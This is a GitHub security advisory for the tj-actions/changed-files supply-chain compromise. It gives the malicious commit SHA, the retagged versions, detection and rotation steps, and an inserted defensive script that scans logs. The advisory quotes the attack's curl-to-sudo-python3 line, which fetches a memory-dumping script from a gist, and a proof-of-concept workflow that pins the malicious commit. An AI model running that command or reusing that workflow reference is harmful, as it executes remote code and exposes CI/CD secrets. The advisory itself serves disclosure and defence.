CVE-2025-30066 – tj-actions/changed-files

Package

Manager: github_actions
Name: tj-actions/changed-files
Vulnerable Version: >=0 <46.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

EPSS: 0.88385 (percentile 0.99469)

Details

tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.

### Summary

A supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.

This has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1).

### Details

The attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.

#### Key Indicators of Compromise (IoC):

- **Malicious commit**: [0e58ed8671d6b60d0890c21b07f8835ace038e67](https://github.com/tj-actions/changed-files/commit/0e58ed8671d6b60d0890c21b07f8835ace038e67)
- **Retroactively updated tags pointing to the malicious commit**:
  - `v1.0.0`: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  - `v35.7.7-sec`: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  - `v44.5.1`: 0e58ed8671d6b60d0890c21b07f8835ace038e67

#### Malicious Code Execution:

The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:

```
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`
```

This script targeted the **Runner Worker process**, extracting and exfiltrating its memory contents.

### Proof of Concept (PoC)

#### Steps to Reproduce:

1. Create a GitHub Actions workflow using the **tj-actions/changed-files** action:

   ```yml
   name: "tj-action changed-files incident"
   on:
     pull_request:
       branches:
         - main
   jobs:
     changed_files:
       runs-on: ubuntu-latest
       steps:
         - name: Get changed files
           id: changed-files
           uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67
   ```

2. Run the workflow and inspect the logs in the Actions tab.
3. Vulnerable workflows may display secrets in the logs.

#### Detection:

Analyze network traffic using [Harden-Runner](https://github.com/step-security/harden-runner), which detects unauthorized outbound requests to:

- `gist.githubusercontent.com`

Live reproduction logs: 🔗 [Harden-Runner Insights](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/13866127357)

This attack was detected by **StepSecurity** when anomaly detection flagged an unauthorized outbound network call to `gist.githubusercontent.com`.

### Duration of Vulnerability

The vulnerability was active between **March 14 and March 15, 2025**.

### Action Required

1. **Review your workflows executed between March 14 and March 15**:
   - Check the **changed-files** section for unexpected output.
   - Decode suspicious output using the following command:

     ```
     echo 'xxx' | base64 -d | base64 -d
     ```

   - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.
2. **Update workflows referencing the compromised commit**:
   - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.
3. **Tagged versions**:
   - If you are using tagged versions (e.g., `v35`, `v44.5.1`), no action is required as these tags have been updated and are now safe to use.
4. **Rotate potentially exposed secrets**:
   - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.
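As an added defender-side check (example code, not part of the advisory or the tj-actions project), the following Python script automates the two reviews in the Action Required list: it classifies every `uses: tj-actions/changed-files@...` reference in a workflow file, flagging the malicious commit SHA, and it finds double-base64 blobs in captured step output and decodes them the way the `base64 -d | base64 -d` command does. The regexes, function names and the sample log are constructed for this example.

```python
import base64
import re
import string

# Malicious commit SHA from the advisory; tags v1.0.0, v35.7.7-sec and v44.5.1 were pointed at it.
MALICIOUS_SHA = "0e58ed8671d6b60d0890c21b07f8835ace038e67"
USES_RE = re.compile(r"uses:\s*tj-actions/changed-files@([\w.\-/]+)")
# Candidate blobs: long runs of the base64 alphabet, optionally padded (heuristic built for this example).
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PRINTABLE = set(string.printable)

def audit_workflow(yaml_text):
    """Classify every tj-actions/changed-files reference found in a workflow file."""
    findings = []
    for ref in USES_RE.findall(yaml_text):
        if ref == MALICIOUS_SHA:
            findings.append((ref, "malicious commit"))
        elif re.fullmatch(r"[0-9a-f]{40}", ref):
            findings.append((ref, "sha-pinned"))
        else:
            # Tags were repaired per the advisory; pinning to a SHA prevents a repeat retag.
            findings.append((ref, "mutable tag"))
    return findings

def _double_b64_decode(token):
    """Mirror `base64 -d | base64 -d`; return text only if both layers decode to printable UTF-8."""
    try:
        inner = base64.b64decode(token, validate=True)
        plain = base64.b64decode(inner, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return plain if plain and set(plain) <= PRINTABLE else None

def scan_log(log_text):
    """Return the decoded text of every double-base64 blob in the changed-files step output."""
    return [
        plain
        for line in log_text.splitlines()
        for token in B64_RE.findall(line)
        if (plain := _double_b64_decode(token)) is not None
    ]

# Constructed sample: a fake credential encoded twice, as the malicious step did, inside ordinary log lines.
SAMPLE_SECRET = "AWS_SECRET_ACCESS_KEY=EXAMPLEKEY0123456789"
SAMPLE_BLOB = base64.b64encode(base64.b64encode(SAMPLE_SECRET.encode())).decode()
SAMPLE_LOG = f"Run tj-actions/changed-files@v44.5.1\n{SAMPLE_BLOB}\nAll changed files: src/app.py\n"

if __name__ == "__main__":
    print(audit_workflow("      uses: tj-actions/changed-files@" + MALICIOUS_SHA))
    print(scan_log(SAMPLE_LOG))
```

A single-layer base64 token (for example an ordinary SHA or a one-time-encoded value) fails the second decode and is not reported, so only output shaped like the incident's double-encoded blobs is surfaced.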
### Impact

- **Type of vulnerability**: Supply chain attack, Secrets exposure, Information leakage
- **Who is impacted**:
  - Over 23,000 repositories using **tj-actions/changed-files**.
  - Organizations with public repositories are at the highest risk, as their logs may already be compromised.
- **Potential consequences**:
  - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys).
  - Unauthorized access to source code, infrastructure, and production environments.
  - Credential leaks in public repositories, enabling further supply chain attacks.

Metadata

Created: 2025-03-15T06:30:34Z
Modified: 2025-03-24T14:23:37Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-mrrh-fwg8-r2c3/GHSA-mrrh-fwg8-r2c3.json
CWE IDs: ["CWE-506"]
Alternative ID: GHSA-mrrh-fwg8-r2c3
Finding: F448
Auto approve: 1